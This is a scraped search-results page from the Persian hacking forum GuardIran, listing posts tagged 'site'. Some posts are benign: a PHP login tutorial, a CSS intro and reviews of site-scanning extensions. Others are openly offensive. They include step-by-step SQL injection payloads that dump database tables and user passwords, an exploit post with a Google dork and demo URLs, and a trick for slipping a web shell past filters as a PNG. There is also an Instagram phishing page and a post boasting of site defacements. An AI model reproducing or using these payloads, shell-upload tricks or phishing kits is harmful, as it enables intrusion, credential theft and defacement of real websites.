رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'site'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

20 نتیجه پیدا شد

  1. MR.MSA

    صفحه ثبت نام و ورود بدون دیتابیس | با PHP

    با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته:‌ دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
  2. بسم الله الرحمن الرحیم ابزار جدید برای پیدا کردن صفحه ادمین این برنامه بی نقص هست و 2 هفته هست که ساخته شده انشالله بهتون کمکی کرده باشم git clone [Hidden Content] cd FalconViewer pip3 install -r requestments.txt python3 FalconViewer.py سربلند و پیروز باشید
  3. MR.MSA

    Sql injection Exploit

    با سلام خدمت دوستان . در این تاپیک اکسپلویت های sql injection رو میزارم برای دوستانی که به اسیب پذیری sql injection علاقمند هستند . Exploit 1 : Web Mingo I.T. Solutions - SQL Injection vulnerability ********************************************************* #Exploit Title: Web Mingo I.T. Solutions - SQL Injection vulnerability #Date: 2020-11-10 #Google Dork: "Design & Developed By Web Mingo I.T. Solutions" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design & Developed By Web Mingo I.T. Solutions" Demo : [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--+ [Hidden Content],version(),3,4,5,6,7,8,9--+ [Hidden Content],2,3,4,version(),6,7--+
  4. MR.MSA

    بایپس آنتی شل

    با سلام خدمت کاربران و مدیران سایت گارد ایران در این تاپیک قصد دارم به شما آموزش دور زدن آنتی شل رو بدم که شاید بیشتر جاها بدردتون بخوره . روش اول : دو بار encode کردن شل با base64 که می توانید از این سایت کمک بگیرید . --------------- روش دوم : شل رو به فرمت png تغییر دهید . یک فایل دیگر با فرمت php بسازید و این کد رو در اون قرار دهید : <?php include_once("shell.png"); ?> تا سایت اون فایل رو با فرمت php بخونه . --------------- پیشنهاد می کنم هر دو روش رو در کنار هم انجام دهید تا انتی شلر بهتر بایپس شود . امیدوارم از این تاپیک لذت برده باشید و بدردتون بخوره و تاپیک خوبی رو گذاشته باشم .
  5. MR.MSA

    آموزش CSS - به همراه مثال

    با سلام خدمت دوستان عزیز گاردایران در این تاپیک قصد دارم زبان برنامه نویسی CSS رو به شما آموزش بدهم . ----------------------------------------------------------------------------------------------------------------------- ابتدا کمی با css اشنا شویم :‌ css یک زبان برنامه نویسی تحت وب هست که بیشتر در کنار html استفاده می شود ، این زبان برای طراحی سایت از نظر ظاهری هست . برای مثال رنگ متن ها ، پس زمینه ، نوع اسکرول و ... رو با css طراحی می کنند . امروزه که بیشتر افراد به طراحی وب و برنامه نویسی تحت وب روی اورده اند زبان css می تونه زبان کاربردی باشه . پیش نیاز css ، اشنایی با زبان html هست . دیگه بیشتر از این سرتون رو درد نمیارم . 😄 ----------------------------------------------------------------------------------------------------------------------- سبک های اضافه کردن css به html : ۱- خارجی و یا External ۲- داخلی و یا internal ۳- درون خطی و یا inline که در تاپیک بعد به همراه مثال خدمتتون عرض می کنم . ----------------------------------------------------------------------------------------------------------------------- قوانین تاپیک : اسپم ندید . سوالات رو در پ.خ ارسال کنید . کتاب و مقالات رو در اینجا ارسال نکنید . (مگر اینکه خودتون نوشته باشید) اگر قصد گذاشتن آموزشی در رابطه با css دارید ابتدا به من پیام دهید (در غیر این صورت پست شما حذف می شود ) . موفق و پیروز باشید .
  6. MR.MSA

    Download Keyword

    برای پیدا کردن نوع دیتابیس یک سایت می توانید از افزونه های Wappalyzer و WgatRuns که در سایت هم معرفی شده استفاده کنید . در بعضی تارگت ها نمی توانید از این ها استفاده کنید و آن موقع است که از key word ها استفاده می کنیم و فقط باید یک key word را در کنار ادرس سایت قرار دهیم اگر سایت بدون هیچ مشکلی لود شد یعنی از همان دیتابیس استفاده می کند . مثال : site.com/news.php?id=1(key word) (در فایل KeyWords.txt می توانید key word های هر دیتابیس را مشاهده کنید و از آنها استفاده کنید . ) KeyWords.txt
  7. MR.MSA

    متد Having

    بایپس نشان ندادن ستون آسیب پذیر اگر بایپس هایی مثل null کردن را انجام دادید و نتیجه نداد باید از Having استفاده کنید . نوع having ها : Having null Having false Having 0 Having 1 like 0 Having 1 limit 0 به این صورت : ......?id=1+<having>+union+select+1,2,3,4,5,6,7,8,9 در جایی که نوشته شده <having> باید نوع having را بنویسید . مثال : .....?id=2 having null+union+select+1,2,3,4,5,6,7,8,9-- تمام having ها را انجام دهید تا به نتیجه برسید . امیدوارم لذت برده باشید . 💙 فراموش نشه 😍
  8. MR.MSA

    سایت برای ساخت اپلیکیشن وب

    با سلام خدمت کاربران و مدیران گارد ایران در این پست قصد دارم یک سایت برای ساخت اپلیکیشن وب را به شما معرفی کنم . سایت : appyet.com نکاته قابل توجه : برنامه ها فقط برای اندروید هستند . ویژگی های زیادی دارد . دوستان توجه داشته باشید که اگر دوستی از این سایت استفاده کرد و به مشکل امنیتی برخورد حتما اطلاع دهند تا بقیه کاربران آگاه باشند .
  9. MR.MSA

    پیج فیک اینستاگرام

    با سلام خدمت تمام کاربران و مدیران GUARDIRAN در این تاپیک قصد دارم یک پیج فیک اینستاگرام رو به شما دوستان عزیز بدم . فقط دوستان توجه داشته باشید که باید هر چیزی که بین این کامنت هست رو حذف کنید : <!--***************************** MR.MSA *****************************--> برای دانلود به فایل پیوست مراجعه کنید . --------------------- امید وارم از این پست لذت برده باشید و از فیک پیج اینستاگرام استفاده کرده باشید . یه مشکلات ریز داشت یه خوبی خودتون ببخشید . ******************** MR.MSA ***************** Fake Page Instagram.zip
  10. با سلام خدمت انجمن گارد ایران من MR.MSA در این تاپیک قصد دارم یک افزونه دیگر تحت عنوان WhatRuns رو به شما معرفی کنم این افزونه هم یک اسکنر مانند افزونه wappalyzer است که برای جمع آوری اطلاعات بدرد بخور است . سایت افزونه => [Hidden Content] ----------------------------- بخش های جمع آوری اطلاعات و مهم WhatRuns که هنگام اسکن به شما نمایش داده می شود : - CMS - CDN - Font Script - Javascript Graphics - Web Framework - Message Board - Web Server - Rich Text Editors - Font - Javascript Frameworks - Database - Dev Tools - Message Board - Analytics - و.. ----------------------------- نکات قابل توجه : توجه داشته باشید که تمامی بخش های بالا شامل تمامی سایت ها نمی باشد چون بعضی سایت ها هستند که اطلاعات کمی می توان از آن ها بدست آورد . این افزونه سرعت نسبتا خوبی برای اسکن و انالیز سایت ها دارد و من خودم از این افزونه استفاده می کنم . ----------------------------- میزان خطای افزونه : تقریبا بین ۵ تا ۱۵ درصد میزان خطای این افزونه است . می توان گفت افزونه WhatRuns میزان خطای کمی نسبت به افزونه های دیگر دارد . ----------------------------- لینک دانلود افزونه WhatRuns : Chrome FireFox --------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <------------------------MR.MSA----------------------/>
  11. MR.MSA

    افزونه اسکن سایت های wordpress

    با سلام خدمت شما کاربران و مدیران عزیز انجمن Guardiran من MR.MSA در این تاپیک قصد دارم یک افزونه WordPress Theme Detector and Plugin Detector برای اسکن سایت های وردپرسی را به شما معرفی کنم . ---------------------------------------------------------- ویژگی ها : نوع پوسته (them) سایت افزونه های معروف استفاده شده در سایت ورژن تم و پلاگین های سایت ---------------------------------------------------------- نکات قابل توجه : این افزونه برای بعضی از سایت های وردپرسی خوب جواب نمی دهد ولی در بعضی سایت ها بدرد بخور هست. برای ورژن تم و پلاگین خوب عمل می کند . مشکلی که این افزونه دارد این است که سرعت اسکن پایینی دارد. ---------------------------------------------------------- میزان خطا افزونه : تقریبا بین ۳۰ تا ۴۰ درصد میزان خطای این افزونه است.(طبق برسی من ) ---------------------------------------------------------- دانلود افزونه WordPress Theme Detector and Plugin Detector : Chorme FireFox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو گذاشته باشم و از این افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************* MR.MSA ************* <------------------------MR.MSA----------------------> ------- باگ -------- <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <نکته مهم در متد join > ----- افزونه ------ <افزونه Wapplyzer (اسکنر سایت ) > ------- نرم افزار -------- <نرم افزار ریکاوری برای مک> ------- کالی لینوکس ------ <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس > <------------------------MR.MSA----------------------/>
  12. MR.MSA

    افزونه Wappalyzer (اسکنر سایت)

    با سلام خدمت شما دوستان عزیز سایت GUARDIRAN.ORG من MR.MSA در این تاپیک قراره است افزونه Wappalyzer رو به شما معرفی کنم . لینک دانلود در آخر پست . ---------------------------------------------------------- افزونه Wappalyzer اسکنر سایت است که با آن شما می توانید : ۱- نوع cms سایت ۲- افزونه های نصب شده در سایت ۳- زبان های برنامه نویسی استفاده شده در سایت و زبان برنامه نویسی اصلی سایت ۴- نوع دیتابیس سایت ۵- ورژن cms ، پلاگین ، زبان برنامه نویسی سایت . ۶- و..... رو بدست آورید . ---------------------------------------------------------- نکات قابل توجه : در بعضی از سایت ها افزونه توان پیدا کردن بعضی اطلاعات را ندارد بنابراین نمیشه گفت که تمامی اطلاعات را به شما می دهد ولی در بیشتر سایت ها امکان پیدا کردن اطلاعات وجود دارد . ---------------------------------------------------------- میزان خطای افزونه : میتوان گفت بین ۲۰ تا ۳۰ درصد این افزونه خطا دارد . ---------------------------------------------------------- لینک دانلود افزونه Wappalyzer : chrome Firefox ---------------------------------------------------------- امیدوارم از این تاپیگ لذت برده باشید و پست خوبی رو نوشته باشم و از افزونه بهرهمند شده باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > <نکته مهم در متد join > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  13. MR.MSA

    نکته مهم در متد join

    با سلام همانطور که در آموزش متد join در sql injection گفتم چند نکته در رابطه با متد join هست که باید بگویم که در این پست قرار است این نکات رو شرح بدم . در بعضی از تارگت ها ممکن است زمان محدود سازی سایت به = حساس باشد : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ پس شما باید از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+group_concat(table_name)+from+information_schema.tables+where+table_schema+like+’dbname’)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 به جای dbname نام دیتابیس مورد نظر را بزنید (در بین دو کتیشن ) و اگر با مشکل مواجه شدید دو کتیشن را حذف کنید و نام دیتابیس را بصورت hex بنویسید . ------------------------------ برای بدست آوردن نام دیتابیس در متد join از این دستور استفاده کنید : site.com/news.php?id=3+union+select+*from (select 1)a+join+(select+database())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ------------------------------ امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و متد join رو به خوبی یاد گرفته باشید . هر گونه سوال در مورد پست داشتید در قسمت پرسش و پاسخ بپرسید . ************ MR.MSA ************ <آموزش متد polygon در sql injection > < آموزش متد join در sql injection > <دانلود نسخه های ۲۰۱۸ و ۲۰۱۹ کالی لینوکس> <دانلود نسخه های ۲۰۱۶ و ۲۰۱۷ کالی لینوکس> <دانلود نسخه های ۱ تا ۲ کالی لینوکس >
  14. MR.MSA

    متد join در sql injection

    با سلام خدمت شما کاربران عزیز انجمن گارد ایران در این پست می خواهم متد join رو در باگ sql injection به شما آموزش بدهم . ------------------------ موارد قابل استفاده : ۱- مواجه شدن با خطا زمان استفاده از union select ۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list ۳- زمانی که سایت به عدد حساس است . ۴- و.... ------------------------ نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از /**/ استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . ------------------------ نحوه استفاده از متد join :‌ ---------------------------------------- ( برای مثال تعداد تیبل های سایت ۵ تا می باشد. ) مرحله اول بیرون کشیدن ستون آسیب پذیر :‌ +union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+ و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید : from * توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join ---------------------------------------- ( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲ آسیب پذیر است. ) مرحله دوم بدست آوردن ورژن : +union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23 ---------------------------------------- مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) : union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید . ---------------------------------------- ( برای مثال در بین تیبل ها تیبل msa_users وجود دارد . ) مرحله چهارم بیرون کشیدن ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید . ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست . ---------------------------------------- ( برای مثال در خروجی ستون های user و pass مهم است . ) مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل : union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+ به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید. و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است ) ---------------------------------------- امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . هر گونه سوال در مورد پست داشتید بپرسید . ********* MR.MSA ********** Join method in sql injection.txt
  15. RedNofozi

    python-2.7.1

    python-2.7.1.amd64 سلام بیشتر برنامه های هک ابزار هک روی این پایتون اجرا میشه ورژن اخرشم اپلود میشه با تشکر از مدیران و ادمین python-2.7.1.amd64.rar
  16. درود ../ با آموزش بایپس انواع آپلودر در خدمتتون هستیم در این روش ما دیفیس پیج خودمون رو به سادگی آپلود میکنیم خیلی از سرویس دهندگان آپلودر این باگ رو دارن باگ توسط اعضای تیم امنیتی گارد ایران کشف شده (MR.IMAN , Reza.Attacker , 1TED) کلیپ در دو پارت تقسیم بندی شده رمز فایل فشرده: guardiran.org لینک اثبات یکی از سایت های هک شده با این روش [Hidden Content] یا حـ ـق ../ 22-07-2016 01-21-51 ب-ظ.part1.rar 22-07-2016 01-21-51 ب-ظ.part2.rar
  17. سلام اگه میشه آموزش باگxss رو بذارید و چجور بتونیم به سایت نفوذ کنیم . دیتا بیس سایت رو هم بیرون بیاریم
  18. با سلام وخسته نباشید میشه یه آموزش در مورد هک کردن سایت های بدون باگ یا همون روش بایپس سرور کردن رو یاد بدید و چجور یک سایت رو از طریقftp هک کنید لطف کنید آموزش ها تصویری باشه باشکر
  19. با سلام به همه مدیران و کاربران گارد ایران اگه میشه نحوه هک کردن سایت رو با کالی به صورت تصویری بذارید ممنون میشم
×
×
  • ایجاد مورد جدید...